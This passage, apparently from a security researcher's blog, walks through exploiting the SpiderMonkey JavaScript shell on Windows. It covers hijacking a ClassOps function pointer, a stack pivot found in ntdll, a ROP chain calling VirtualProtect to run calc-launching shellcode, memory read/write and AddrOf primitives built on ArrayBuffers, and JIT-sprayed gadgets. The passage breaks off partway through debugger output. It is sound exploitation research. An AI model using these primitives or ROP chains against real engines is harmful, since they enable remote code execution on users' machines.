Cool. Before moving forward, we should probably verify that, if we were able to control the cOps function pointers, we would indeed be able to hijack control flow from JavaScript.

Well, let's overwrite the cOps.addProperty field directly from the debugger:

0:000> eq 0x00007ff7`f7edc690 deadbeefbaadc0de

0:000> g

And add a property to the object:

js> c.diary_of_a_reverse_engineer = 1337

0:000> g
(3af0.3b40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
js!js::CallJSAddPropertyOp+0x6c:
00007ff7`80e400cc 48ffe0          jmp     rax {deadbeef`baadc0de}

0:000> kc
 # Call Site
00 js!js::CallJSAddPropertyOp
01 js!CallAddPropertyHook
02 js!AddDataProperty
03 js!DefineNonexistentProperty
04 js!SetNonexistentProperty<1>
05 js!js::NativeSetProperty<1>
06 js!js::SetProperty
07 js!SetPropertyOperation
08 js!Interpret
09 js!js::RunScript
0a js!js::ExecuteKernel
0b js!js::Execute
0c js!ExecuteScript
0d js!JS_ExecuteScript
0e js!RunFile
0f js!Process
10 js!ProcessArgs
11 js!Shell
12 js!main
13 js!invoke_main
14 js!__scrt_common_main_seh
15 KERNEL32!BaseThreadInitThunk
16 ntdll!RtlUserThreadStart

Thanks to the Pwn class we wrote earlier, this should be pretty easy to pull off. We can use Pwn.AddrOf to leak an object address (the object is called Target below), follow the chain of pointers, and recreate those structures by copying their contents into the backing buffer of a TypedArray (called MemoryBackingObject below). Once this is done, we simply overwrite the addProperty field of our target object.

//
// Retrieve a bunch of addresses needed to replace Target's clasp_ field.
//

const Target = new Uint8Array(90);
const TargetAddress = Pwn.AddrOf(Target);
const TargetGroup_ = Pwn.ReadPtr(TargetAddress);
const TargetClasp_ = Pwn.ReadPtr(TargetGroup_);
const TargetcOps = Pwn.ReadPtr(Add(TargetClasp_, 0x10));
const TargetClasp_Address = Add(TargetGroup_, 0x0);

const TargetShapeOrExpando_ = Pwn.ReadPtr(Add(TargetAddress, 0x8));
const TargetBase_ = Pwn.ReadPtr(TargetShapeOrExpando_);
const TargetBaseClasp_Address = Add(TargetBase_, 0);

const MemoryBackingObject = new Uint8Array(0x88);
const MemoryBackingObjectAddress = Pwn.AddrOf(MemoryBackingObject);
const ClassMemoryBackingAddress = Pwn.ReadPtr(Add(MemoryBackingObjectAddress, 7 * 8));
// 0:000> ?? sizeof(js!js::Class)
// unsigned int64 0x30
const ClassOpsMemoryBackingAddress = Add(ClassMemoryBackingAddress, 0x30);
print('[+] js::Class / js::ClassOps backing memory is @ ' + MemoryBackingObjectAddress.toString(16));

//
// Copy the original Class object into our backing memory, and hijack
// the cOps field.
//

MemoryBackingObject.set(Pwn.Read(TargetClasp_, 0x30), 0);
MemoryBackingObject.set(ClassOpsMemoryBackingAddress.bytes(), 0x10);

//
// Copy the original ClassOps object into our backing memory and hijack
// the add property.
//

MemoryBackingObject.set(Pwn.Read(TargetcOps, 0x50), 0x30);
MemoryBackingObject.set(new Int64('0xdeadbeefbaadc0de').bytes(), 0x30);

print("[*] Overwriting Target's clasp_ @ " + TargetClasp_Address.toString(16));
Pwn.WritePtr(TargetClasp_Address, ClassMemoryBackingAddress);
print("[*] Overwriting Target's shape clasp_ @ " + TargetBaseClasp_Address.toString(16));
Pwn.WritePtr(TargetBaseClasp_Address, ClassMemoryBackingAddress);

//
// Let's pull the trigger now.
//

print('[*] Pulling the trigger bebe..');
Target.im_falling_and_i_cant_turn_back = 1;

Note that we also overwrite another field in the shape object, as the debug version of the JavaScript shell has an assert ensuring that the object class retrieved from the shape is identical to the one in the object group. If you don't, here is the crash you will encounter:

Assertion failure: shape->getObjectClass() == getClass(), at c:\Users\over\mozilla-central\js\src\vm/NativeObject-inl.h:659

Pivoting the stack

As always with modern exploitation, hijacking control-flow is only the beginning of the journey. We want to execute arbitrary native code in the JavaScript shell. To exploit this traditionally with ROP, we have three of the four ingredients:

  • We know where things are in memory,
  • We have a way to control the execution,
  • We have arbitrary space to store the chain and aren't constrained in any way,
  • But we do not have a way to pivot the stack to a region of memory we have under our control.

Now, if we want to pivot the stack to a location under our control, we need some sort of control over the CPU context when we hijack the control-flow. To understand a bit more which cards we are playing with, we need to investigate how this function pointer is invoked and see if we can control any arguments, etc.

/** Add a property named by id to obj. */
typedef bool (*JSAddPropertyOp)(JSContext* cx, JS::HandleObject obj,
                                JS::HandleId id, JS::HandleValue v);

And here is the CPU context at the hijack point:

0:000> r
rax=000000000001fff1 rbx=000000469b9ff490 rcx=0000020a7d928800
rdx=000000469b9ff490 rsi=0000020a7d928800 rdi=deadbeefbaadc0de
rip=00007ff658b7b3a2 rsp=000000469b9fefd0 rbp=0000000000000000
 r8=000000469b9ff248  r9=0000020a7deb8098 r10=0000000000000000
r11=0000000000000000 r12=0000020a7da02e10 r13=000000469b9ff490
r14=0000000000000001 r15=0000020a7dbbc0b0
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
js!js::NativeSetProperty<js::Qualified>+0x2b52:
00007ff6`58b7b3a2 ffd7            call    rdi {deadbeef`baadc0de}

Let's break down the CPU context:

  1. @rdx is obj, which is a pointer to the JSObject (Target in the script above; note that @rbx holds the same value),
  2. @r8 is id, a pointer to a jsid describing the name of the property we are trying to add (im_falling_and_i_cant_turn_back in our case),
  3. @r9 is v, a pointer to a js::Value (the JavaScript integer 1 in the script above).

As always, reality check in the debugger:

0:000> dqs @rdx l1
00000046`9b9ff490  0000020a`7da02e10

0:000> !smdump_jsobject 0x20a7da02e10
20a7da02e10: js!js::TypedArrayObject:       Type: Uint8Array
20a7da02e10: js!js::TypedArrayObject:     Length: 90
20a7da02e10: js!js::TypedArrayObject: ByteLength: 90
20a7da02e10: js!js::TypedArrayObject: ByteOffset: 0
20a7da02e10: js!js::TypedArrayObject:    Content: Uint8Array({Length:90, ...})
@$smdump_jsobject(0x20a7da02e10)


0:000> dqs @r8 l1
00000046`9b9ff248  0000020a`7dbaf100

0:000> dqs 0000020a`7dbaf100
0000020a`7dbaf100  0000001f`00000210
0000020a`7dbaf108  0000020a`7dee2f20

0:000> da 0000020a`7dee2f20
0000020a`7dee2f20  "im_falling_and_i_cant_turn_back"


0:000> dqs @r9 l1
0000020a`7deb8098  fff88000`00000001

0:000> !smdump_jsvalue 0xfff8800000000001
1: JSVAL_TYPE_INT32: 0x1
@$smdump_jsvalue(0xfff8800000000001)

It is not perfect, but it sounds like we have at least some amount of control over the context. Looking back at it, I guess I could have gone several ways (a few described below):

  1. As @rdx points to the Target object, we could try to pivot to the inline backing buffer of the TypedArray to trigger a ROP chain,
  2. As @r8 points to a pointer to an arbitrary string of our choice, we could inject a pointer to the location of our ROP chain disguised as the content of the property name,
  3. As @r9 points to a js::Value, we could try to inject a double that once encoded is a valid pointer to a location with our ROP chain.

At the time, I only saw one way: the first one. The idea is to create a TypedArray with the biggest inline buffer possible. Leveraging the inline buffer means there are fewer memory dereferences to do, which makes the pivot simpler. Assuming we manage to pivot in there, we can have a very small ROP chain redirecting to a second one stored somewhere we have infinite space.

The stack-pivot gadget we are looking for looks like the following - pivoting in the inline buffer:

rsp <- [rdx] + X with 0x40 <= X < 0x40 + 90

Or - pivoting into the buffer pointed to by the DATA_SLOT:

rsp <- [[rdx] + 0x38]

Finding this pivot actually took me way more time than I expected. I spent a bunch of time trying to find it manually and trying various combinations (JOP, etc.). This didn't really work, at which point I decided to code up a tool that would try to pivot to every executable byte available in the address space and emulate forward until seeing a crash with rsp containing marker bytes.

After banging my head around and failing for a while, this solution eventually worked. It was not perfect: I wanted to only look for gadgets inside the js.exe module at first, but it turns out the one pivot the tool found is in ntdll.dll. This is annoying for basically two reasons:

  1. It means that we also need to leak the base address of the ntdll module. Fine, this should not be hard to pull off, but just more code to write.

  2. It also means that the exploit now relies on a system module that changes over time (different versions of Windows, security updates to ntdll, etc.), making it even less reliable.

Oh well, I figured that I would first focus on making the exploit work as opposed to feeling bad about the reliability part. Those would be problems for another day (and this is what kaizen.js tries to fix).

Here is the gadget that my tool ended up finding:

0:000> u ntdll+000bfda2 l10
ntdll!TpSimpleTryPost+0x5aeb2:
00007fff`b8c4fda2 f5              cmc
00007fff`b8c4fda3 ff33            push    qword ptr [rbx]
00007fff`b8c4fda5 db4889          fisttp  dword ptr [rax-77h]
00007fff`b8c4fda8 5c              pop     rsp
00007fff`b8c4fda9 2470            and     al,70h
00007fff`b8c4fdab 8b7c2434        mov     edi,dword ptr [rsp+34h]
00007fff`b8c4fdaf 85ff            test    edi,edi
00007fff`b8c4fdb1 0f884a52faff    js      ntdll!TpSimpleTryPost+0x111 (00007fff`b8bf5001)

0:000> u 00007fff`b8bf5001
ntdll!TpSimpleTryPost+0x111:
00007fff`b8bf5001 8bc7            mov     eax,edi
00007fff`b8bf5003 488b5c2468      mov     rbx,qword ptr [rsp+68h]
00007fff`b8bf5008 488b742478      mov     rsi,qword ptr [rsp+78h]
00007fff`b8bf500d 4883c440        add     rsp,40h
00007fff`b8bf5011 415f            pop     r15
00007fff`b8bf5013 415e            pop     r14
00007fff`b8bf5015 5f              pop     rdi
00007fff`b8bf5016 c3              ret

And here are the parts that actually matter:

00007fff`b8c4fda3 ff33            push    qword ptr [rbx]
[...]
00007fff`b8c4fda8 5c              pop     rsp
00007fff`b8bf500d 4883c440        add     rsp,40h
[...]
00007fff`b8bf5016 c3              ret

Of course, if you have followed along, you might be wondering what the value of @rbx is at the hijack point, as we did not really spend any time talking about it. Well, if you scroll up a bit, you will notice that @rbx holds the same value as @rdx, which is a pointer to the JSObject describing Target.

  1. The first line pushes the JSObject pointer onto the stack,
  2. The second line pops it off the stack into @rsp,
  3. The third line adds 0x40 to it, which means @rsp now points into the inline backing buffer of the TypedArray, whose content we fully control,
  4. And finally, we return.

With this pivot, we have control over the execution flow, as well as control over the stack; this is good stuff :-). The ntdll module used at the time is available here ntdll (RS5 64-bit, Jan 2019) in case anyone is interested.

The below shows step-by-step what it looks like from the debugger once we land on the above stack-pivot gadget:

0:000> bp ntdll+bfda2

0:000> g
Breakpoint 0 hit
ntdll!TpSimpleTryPost+0x5aeb2:
00007fff`b8c4fda2 f5              cmc

0:000> t
ntdll!TpSimpleTryPost+0x5aeb3:
00007fff`b8c4fda3 ff33            push    qword ptr [rbx] ds:000000d8`a93fce78=000002b2f7509140

[...]

0:000> t
ntdll!TpSimpleTryPost+0x5aeb8:
00007fff`b8c4fda8 5c              pop     rsp

[...]

0:000> t
ntdll!TpSimpleTryPost+0x11d:
00007fff`b8bf500d 4883c440        add     rsp,40h

[...]

0:000> t
ntdll!TpSimpleTryPost+0x126:
00007fff`b8bf5016 c3              ret

0:000> dqs @rsp
000002b2`f7509198  00007ff7`805a9e55 <- Pivot again to a larger space
000002b2`f75091a0  000002b2`f7a75000 <- The stack with our real ROP chain

0:000> u 00007ff7`805a9e55 l2
00007ff7`805a9e55 5c              pop     rsp
00007ff7`805a9e56 c3              ret

0:000> dqs 000002b2`f7a75000
000002b2`f7a75000  00007ff7`805fc4ec <- Beginning of the ROP chain that makes this region executable
000002b2`f7a75008  000002b2`f7926400
000002b2`f7a75010  00007ff7`805a31da
000002b2`f7a75018  00000000`000002a8
000002b2`f7a75020  00007ff7`80a9c302
000002b2`f7a75028  00000000`00000040
000002b2`f7a75030  00007fff`b647b0b0 KERNEL32!VirtualProtectStub
000002b2`f7a75038  00007ff7`81921d09
000002b2`f7a75040  11111111`11111111
000002b2`f7a75048  22222222`22222222
000002b2`f7a75050  33333333`33333333
000002b2`f7a75058  44444444`44444444

Awesome :).

Leaking ntdll base address

Solving the above step unfortunately added another problem to our list. Even though we found a pivot, we now need to retrieve at runtime where the ntdll module is loaded.

As this exploit is already pretty full of hardcoded offsets and bad decisions, there is an easy way out. We already have the base address of the js.exe module, and we know js.exe imports functions from a bunch of other modules such as kernel32.dll (but not ntdll.dll). From there, I basically dumped all the functions imported from kernel32.dll and saw this:

0:000> !dh -a js
[...]
  _IMAGE_IMPORT_DESCRIPTOR 00007ff781e3e118
    KERNEL32.dll
      00007FF781E3D090 Import Address Table
      00007FF781E3E310 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

0:000> dqs 00007FF781E3D090
00007ff7`81e3d090  00007fff`b647c2d0 KERNEL32!RtlLookupFunctionEntryStub
00007ff7`81e3d098  00007fff`b6481890 KERNEL32!RtlCaptureContext
00007ff7`81e3d0a0  00007fff`b6497390 KERNEL32!UnhandledExceptionFilterStub
00007ff7`81e3d0a8  00007fff`b6481b30 KERNEL32!CreateEventW
00007ff7`81e3d0b0  00007fff`b6481cb0 KERNEL32!WaitForSingleObjectEx
00007ff7`81e3d0b8  00007fff`b6461010 KERNEL32!RtlVirtualUnwindStub
00007ff7`81e3d0c0  00007fff`b647e640 KERNEL32!SetUnhandledExceptionFilterStub
00007ff7`81e3d0c8  00007fff`b647c750 KERNEL32!IsProcessorFeaturePresentStub
00007ff7`81e3d0d0  00007fff`b8c038b0 ntdll!RtlInitializeSListHead

As kernel32!InitializeSListHead is a forwarded export to ntdll!RtlInitializeSListHead, we can just go and read at js+0190d0d0 to get an address inside ntdll. From there, we can subtract (another..) hardcoded offset to get the base and voilà.
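With the primitives we already have, the leak itself is tiny. Here is a minimal sketch using the exploit's helpers (Pwn.ReadPtr and Add show up in the code later), assuming a Sub helper mirroring Add, with the build-specific delta left as the hypothetical constant RtlInitializeSListHeadOffset:

// Read the IAT slot of js.exe that holds the forwarded
// ntdll!RtlInitializeSListHead pointer...
const RtlInitializeSListHead = Pwn.ReadPtr(Add(JSBase, 0x190d0d0));

// ...and subtract the (hardcoded, build-specific) offset of the function
// inside this ntdll build to recover the module base.
const NtdllBase = Sub(RtlInitializeSListHead, RtlInitializeSListHeadOffset);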

Executing arbitrary native code

At this point we can execute a ROP payload of arbitrary size, and we want it to dispatch execution to an arbitrary native code payload of our choice. This is pretty easy, standard, and mechanical: we call VirtualProtect to make a TypedArray buffer (the one holding the native payload) executable, and then kindly branch execution there.

Here is the chain used in basic.js:

const PAGE_EXECUTE_READWRITE = new Int64(0x40);
const BigRopChain = [
    // 0x1400cc4ec: pop rcx ; ret  ;  (43 found)
    Add(JSBase, 0xcc4ec),
    ShellcodeAddress,

    // 0x1400731da: pop rdx ; ret  ;  (20 found)
    Add(JSBase, 0x731da),
    new Int64(Shellcode.length),

    // 0x14056c302: pop r8 ; ret  ;  (8 found)
    Add(JSBase, 0x56c302),
    PAGE_EXECUTE_READWRITE,

    VirtualProtect,
    // 0x1413f1d09: add rsp, 0x10 ; pop r14 ; pop r12 ; pop rbp ; ret  ;  (1 found)
    Add(JSBase, 0x13f1d09),
    new Int64('0x1111111111111111'),
    new Int64('0x2222222222222222'),
    new Int64('0x3333333333333333'),
    new Int64('0x4444444444444444'),
    ShellcodeAddress,

    // 0x1400e26fd: jmp rbp ;  (30 found)
    Add(JSBase, 0xe26fd)
];

Instead of coding up my own payload or re-using one from the Internet, I figured I would give a shot to Binary Ninja's Shellcode Compiler (scc). The idea is pretty simple: it allows you to write position-independent payloads in a higher-level language than machine code. You can use a subset of C to write it, and then compile it down to the architecture you want.

void main() {
    STARTUPINFOA Si;
    PROCESS_INFORMATION Pi;
    memset(&Si, 0, sizeof(Si));
    Si.cb = sizeof(Si);
    CreateProcessA(
        NULL,
        "calc",
        NULL,
        NULL,
        false,
        0,
        NULL,
        NULL,
        &Si,
        &Pi
    );
    ExitProcess(1337);
}

I compiled the above with scc.exe --arch x64 --platform windows scc-payload.cc and tada. After trying it out, I quickly noticed that the payload would crash when creating the calculator process. I thought I had messed something up and as a result started to debug it. In the end, it turned out scc's code generation had a bug and would not ensure that the stack pointer was 16-byte aligned. This is an issue because a bunch of SSE instructions accessing memory require destination / source locations to be 16-byte aligned. After reaching out to the Vector35 guys with a description of the problem, they fixed it extremely fast (even before I had written up a small repro; < 24 hours) in the dev channel, which was pretty amazing.

The exploit is now working :). The full source-code is available here: basic.js.


Evaluation

I guess we have finally made it. I have actually rewritten this exploit at least three times to make it less and less convoluted and easier to follow. It sure was not necessary, and it would have been easy to stop earlier and call it a day. I would really encourage you to push yourself to both improve and iterate on your work as much as you can. Every time I tweaked the exploit or rewrote part of it, I learned new things, perfected others, and felt more and more in control. Overall, no time wasted as far as I am concerned :).

Once the excitement and joy calm down (this might require you to pop a hundred calculators, which is totally fine :)), it is always a good thing to take a hard look at what we have accomplished and at the things we could / should improve.

Here is the list of my disappointments:

  • Hardcoded offsets. I don't want any. It should be pretty easy to resolve everything we need at runtime; it just requires us to write more code.
  • The stack pivot we found earlier is not great. It is tied to a specific build of ntdll as mentioned above, and even if we are able to find it in memory at runtime, we have no guarantee that it will still exist tomorrow, which would break the exploit. So it might be a good idea to move away from it sooner rather than later.
  • Having this double pivot is also not that great. It is a bit messy in the code, and sounds like a problem we can probably solve without too much effort if we are planning to rethink the stack pivot anyway.
  • With our current exploit, making the JavaScript shell continue execution does not sound easy. The pivot clobbers a bunch of registers and it is not necessarily clear how many of them we could fix up.

kaizen.js

As you might have guessed, kaizen was the answer to some of the above points. First, we get rid of hardcoded offsets and resolve everything we need at runtime; we want it to work on, let's say, another js.exe binary. To pull this off, a bunch of utilities for parsing PE structures and scanning memory were developed. No rocket science.

The next big thing is to get rid of the ntdll dependency we have for the stack pivot. For that, I decided I would explore Spidermonkey's JIT engines a bit. History has shown that JIT engines can turn out very useful for an attacker. Maybe we will find a way to have it do something nice for us, maybe not :)

That was the rough initial plan I had. There was one thing I did not realize prior to executing it though.

After coding the various PE utilities and starting to use them, I started to observe my exploit crashing a bunch. Ugh, not fun :(. It really felt like it was coming from the memory access primitives that we built earlier. They were working great for the first exploit, but back then we only read a handful of things, whereas now they are exercised much more heavily. Here is one of the crashes I got:

(4b9c.3abc): Break instruction exception - code 80000003 (!!! second chance !!!)
js!JS::Value::toObject+0xc0:
00007ff7`645380a0 b911030000      mov     ecx,311h

0:000> kc
 # Call Site
00 js!JS::Value::toObject
01 js!js::DispatchTyped<js::TenuringTraversalFunctor<JS::Value>,js::TenuringTracer *>
02 js!js::TenuringTracer::traverse
03 js!js::TenuringTracer::traceSlots
04 js!js::TenuringTracer::traceObject
05 js!js::Nursery::collectToFixedPoint
06 js!js::Nursery::doCollection
07 js!js::Nursery::collect
08 js!js::gc::GCRuntime::minorGC
09 js!js::gc::GCRuntime::tryNewNurseryObject<1>
0a js!js::Allocate<JSObject,1>
0b js!js::ArrayObject::createArrayInternal
0c js!js::ArrayObject::createArray
0d js!NewArray<4294967295>
0e js!NewArrayTryUseGroup<4294967295>
0f js!js::jit::NewArrayWithGroup
10 0x0

Two things I forgot: the Nursery is made for storing short-lived objects, and it does not have infinite space. When it gets full, the garbage collector is run over the region to try to clean things up. If some of those objects are still alive, they get moved to the Tenured heap. When this happens, it is a bit of a nightmare for us, because we lose adjacency between our objects and everything basically derails. So that is one thing I did not plan for initially that we need to fix.

Improving the reliability of the memory access primitives

What I decided to do here is pretty simple: move to new ground. As soon as I get to read and write memory thanks to the corruption in the Nursery, I use those primitives to corrupt another set of objects that are allocated in the Tenured heap. I chose ArrayBuffer objects, as they are allocated in the Tenured heap. You can pass an ArrayBuffer to a TypedArray at construction time, and the TypedArray gives you a view into the ArrayBuffer's buffer. In other words, we will still be able to read raw bytes in memory, and once we redefine our primitives it will be pretty transparent.
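As a quick refresher on that relationship:

const AB = new ArrayBuffer(8);    // raw 8-byte buffer, allocated in the Tenured heap
const View = new Uint8Array(AB);  // a view into AB's backing buffer
View[0] = 0x41;                   // reads / writes go straight to the buffer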

class ArrayBufferObject : public ArrayBufferObjectMaybeShared
{
  public:
    static const uint8_t DATA_SLOT = 0;
    static const uint8_t BYTE_LENGTH_SLOT = 1;
    static const uint8_t FIRST_VIEW_SLOT = 2;
    static const uint8_t FLAGS_SLOT = 3;
// [...]
};

First things first: in order to prepare the ground, we simply create two adjacent ArrayBuffers (which are represented by the js::ArrayBufferObject class). Then, we corrupt their BYTE_LENGTH_SLOT (offset +0x28) to make the buffers bigger. The first one is used to manipulate the other and basically service our memory access requests. Exactly like in basic.js, but with ArrayBuffers instead of TypedArrays.

//
// Let's move the battlefield to the TenuredHeap
//

const AB1 = new ArrayBuffer(1);
const AB2 = new ArrayBuffer(1);
const AB1Address = Pwn.AddrOf(AB1);
const AB2Address = Pwn.AddrOf(AB2);

Pwn.Write(
    Add(AB1Address, 0x28),
    [0x00, 0x00, 0x01, 0x00, 0x00, 0x80, 0xf8, 0xff]
);

Pwn.Write(
    Add(AB2Address, 0x28),
    [0x00, 0x00, 0x01, 0x00, 0x00, 0x80, 0xf8, 0xff]
);

Once this is done, we redefine the Pwn.__Access function to use the Tenured objects we just created. It works nearly as before, but one differing detail is that the address of the backing buffer is right-shifted by 1 bit. If the buffer resides at 0xdeadbeef, the address stored in the DATA_SLOT would be 0xdeadbeef >> 1 = 0x6f56df77.

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`65362ac0 4056            push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe0207`ba5980a0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js!js::ArrayBufferObject 0x207`ba5980a0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000207`ba5b19e8 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`6597d2e8 js::HeapSlot

0:000> dqs 0x207`ba5980a0
00000207`ba5980a0  00000207`ba58a8b0
00000207`ba5980a8  00000207`ba5b19e8
00000207`ba5980b0  00000000`00000000
00000207`ba5980b8  00007ff7`6597d2e8 js!emptyElementsHeader+0x10
00000207`ba5980c0  00000103`dd2cc070 <- DATA_SLOT
00000207`ba5980c8  fff88000`00000001 <- BYTE_LENGTH_SLOT
00000207`ba5980d0  fffa0000`00000000 <- FIRST_VIEW_SLOT
00000207`ba5980d8  fff88000`00000000 <- FLAGS_SLOT
00000207`ba5980e0  fffe4d4d`4d4d4d00 <- our backing buffer

0:000> ? 00000103`dd2cc070 << 1
Evaluate expression: 2232214454496 = 00000207`ba5980e0

A consequence of the above is that you cannot read from an odd address, as the last bit gets lost. To work around it, if we encounter an odd address we read from the byte before and read an extra byte. Easy.
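The Pwn.__Access code below leans on an RShift1 helper to compute that shifted address. Here is a minimal sketch of what it could look like, assuming Int64.bytes() returns the value in little-endian order (consistent with how __Access writes it out to the DATA_SLOT) and that the Int64 constructor accepts a byte array (as with the Uint8Array in Pwn.AddrOf later):

function RShift1(Value) {
    const Bytes = Value.bytes();
    const Out = new Array(8).fill(0);
    for(let Idx = 0; Idx < 8; Idx++) {
        // Each byte is halved and inherits the low bit of the byte above it.
        Out[Idx] = Bytes[Idx] >> 1;
        if(Idx + 1 < 8) {
            Out[Idx] |= (Bytes[Idx + 1] & 1) << 7;
        }
    }
    return new Int64(Out);
}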

Pwn.__Access = function (Addr, LengthOrValues) {
    if(typeof Addr == 'string') {
        Addr = new Int64(Addr);
    }

    const IsRead = typeof LengthOrValues == 'number';
    let Length = LengthOrValues;
    if(!IsRead) {
        Length = LengthOrValues.length;
    }

    let OddOffset = 0;
    if(Addr.byteAt(0) & 0x1) {
        Length += 1;
        OddOffset = 1;
    }

    if(AB1.byteLength < Length) {
        throw 'Error';
    }

    //
    // Fix base address: offset 0x40 from AB1's backing buffer lands on AB2's
    // DATA_SLOT, so writing there repoints AB2's data at the target address.
    //

    Addr = RShift1(Addr);
    const Biggie = new Uint8Array(AB1);
    for(const [Idx, Byte] of Addr.bytes().entries()) {
        Biggie[Idx + 0x40] = Byte;
    }

    const View = new Uint8Array(AB2);
    if(IsRead) {
        return View.slice(OddOffset, Length);
    }

    for(const [Idx, Byte] of LengthOrValues.entries()) {
        View[OddOffset + Idx] = Byte;
    }
};

The last primitive to redefine is the AddrOf primitive. For this one I simply used the technique mentioned previously that I have seen used in foxpwn.

As we discussed in the introduction of the article, property values get stored in the associated JSObject. When we define a custom property on an ArrayBuffer, its value gets stored in memory pointed to by the slots_ field (as there is not enough space to store it inline). This means that if we have two contiguous ArrayBuffers, we can leverage the first one to relatively read the second's slots_ field, which gives us the address of the property value. Then, we can simply use our arbitrary read primitive to read the js::Value and strip off a few bits to leak the address of arbitrary objects. Let's assume the below JavaScript code:

js> AB = new ArrayBuffer()
({})

js> AB.doare = 1337
1337

js> objectAddress(AB)
"0000020156E9A080"

And from the debugger this is what we can see:

0:006> dt js::NativeObject 0000020156E9A080
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000201`56eb1a88 Void
   +0x010 slots_           : 0x00000201`57153740 js::HeapSlot
   +0x018 elements_        : 0x00007ff7`b48bd2e8 js::HeapSlot

0:006> dqs 0x00000201`57153740 l1
00000201`57153740  fff88000`00000539 <- 1337

So this is exactly what we are going to do: define a custom property on AB2, relatively read out the js::Value, and boom.

Pwn.AddrOf = function (Obj) {

    //
    // Technique from saelo's foxpwn exploit
    //

    AB2.hell_on_earth = Obj;

    //
    // Offset 48 into AB1's inflated view is where AB2's slots_ field lives.
    //

    const SlotsAddressRaw = new Uint8Array(AB1).slice(48, 48 + 8);
    const SlotsAddress = new Int64(SlotsAddressRaw);
    return Int64.fromJSValue(this.Read(SlotsAddress, 8));
};

kaizen.js

Dynamically resolve exported function addresses

This is really easy to do, but for sure far from being the most interesting or fun part, I hear you..

Given a module base address and a user-provided read function, the utilities walk the module's IAT and resolve API addresses. Nothing fancy; if you are more interested you can read the code in moarutils.js and maybe even reuse it!
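To give an idea of what those utilities boil down to, here is a condensed sketch of an IAT walk built on the primitives from earlier. Dword and ReadCString are small helpers written for this sketch, and the offsets are the standard PE32+ ones; this is the idea, not the actual moarutils.js code:

// Little-endian dword out of a byte array.
function Dword(Bytes) {
    return (Bytes[0] | (Bytes[1] << 8) | (Bytes[2] << 16) | (Bytes[3] << 24)) >>> 0;
}

// Read a NUL-terminated ASCII string with the read primitive.
function ReadCString(Addr) {
    let S = '';
    while(true) {
        const Byte = Pwn.Read(Addr, 1)[0];
        if(Byte == 0) {
            return S;
        }

        S += String.fromCharCode(Byte);
        Addr = Add(Addr, 1);
    }
}

function ResolveImport(ModuleBase, ApiName) {

    //
    // e_lfanew (+0x3c) points to the NT headers; for PE32+ modules the
    // import directory RVA lives at NT headers + 0x90.
    //

    const NtHeadersRva = Dword(Pwn.Read(Add(ModuleBase, 0x3c), 4));
    const ImportRva = Dword(Pwn.Read(Add(ModuleBase, NtHeadersRva + 0x90), 4));

    //
    // Walk the IMAGE_IMPORT_DESCRIPTOR array, 0x14 bytes per entry.
    //

    for(let Idx = 0; ; Idx++) {
        const Descriptor = Add(ModuleBase, ImportRva + (Idx * 0x14));
        const NameTableRva = Dword(Pwn.Read(Descriptor, 4));
        if(NameTableRva == 0) {
            break;
        }

        const AddressTableRva = Dword(Pwn.Read(Add(Descriptor, 0x10), 4));

        //
        // Walk the Import Name Table / Import Address Table in parallel.
        //

        for(let ThunkIdx = 0; ; ThunkIdx++) {
            const Thunk = Pwn.Read(Add(ModuleBase, NameTableRva + (ThunkIdx * 8)), 8);
            const NameRva = Dword(Thunk);
            if(NameRva == 0 && (Thunk[7] & 0x80) == 0) {
                break;
            }

            if(Thunk[7] & 0x80) {
                continue; // Import by ordinal, not interesting here.
            }

            // Skip the two-byte hint of the IMAGE_IMPORT_BY_NAME structure.
            if(ReadCString(Add(ModuleBase, NameRva + 2)) == ApiName) {
                return Pwn.ReadPtr(Add(ModuleBase, AddressTableRva + (ThunkIdx * 8)));
            }
        }
    }

    return null;
}

With something like that, ResolveImport(JSBase, 'VirtualProtect') can replace the hardcoded offsets from basic.js, assuming the API in question actually shows up in js.exe's import table.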

Force the JIT of arbitrary gadgets: Bring Your Own Gadgets

All right, all right, all right, finally the interesting part. One nice thing about the baseline JIT is the fact that there is no constant blinding. What this means is that if we can find a way to force the engine to JIT a function with constants under our control, we can manufacture the gadgets we need in memory. We would not have to rely on an external module, and it would be much easier to craft very custom pieces of assembly that fit our needs. This is what I called Bring Your Own Gadgets in the kaizen exploit. It is nothing new, and I think the appropriate term used in the literature is "JIT code-reuse".

The largest type of constants I could find are doubles, and that is what I focused on ultimately (even though I tried a bunch of other things). To generate doubles that have the same representation as an arbitrary quad-word (8 bytes) -- keeping in mind that, as described above, we cannot represent every 8-byte value -- we leverage two TypedArrays to view the same data in two different representations:

function b2f(A) {
    if(A.length != 8) {
        throw 'Needs to be an 8 bytes long array';
    }

    const Bytes = new Uint8Array(A);
    const Doubles = new Float64Array(Bytes.buffer);
    return Doubles[0];
}

For example, we start off by generating a double representing 0xdeadbeefbaadc0de by invoking b2f (bytes to float):

js> b2f([0xde, 0xc0, 0xad, 0xba, 0xef, 0xbe, 0xad, 0xde])
-1.1885958399657559e+148

Let's start simple and create a basic JavaScript function that assigns this constant to a bunch of different variables:

const BringYourOwnGadgets = function () {
    const D = -1.1885958399657559e+148;
    const O = -1.1885958399657559e+148;
    const A = -1.1885958399657559e+148;
    const R = -1.1885958399657559e+148;
    const E = -1.1885958399657559e+148;
};

To hint to the engine that this function is hot code and, as a result, that it should get JITed to machine code, we invoke it a bunch of times. Every time you call a function, the engine's profiling hooks are invoked to keep track of hot / cold code (among other things). Anyway, according to my testing, invoking the function twelve times triggers the baseline JIT (you should also know about the magic functions inIon and inJit that are documented here):

for(let Idx = 0; Idx < 12; Idx++) {
    BringYourOwnGadgets();
}

The C++ object backing a JavaScript function is a JSFunction. Here is what it looks like in the debugger:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`65362ac0 4056            push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe01b8`2ffb0c00
   +0x000 asDouble_        : -1.#QNAN 
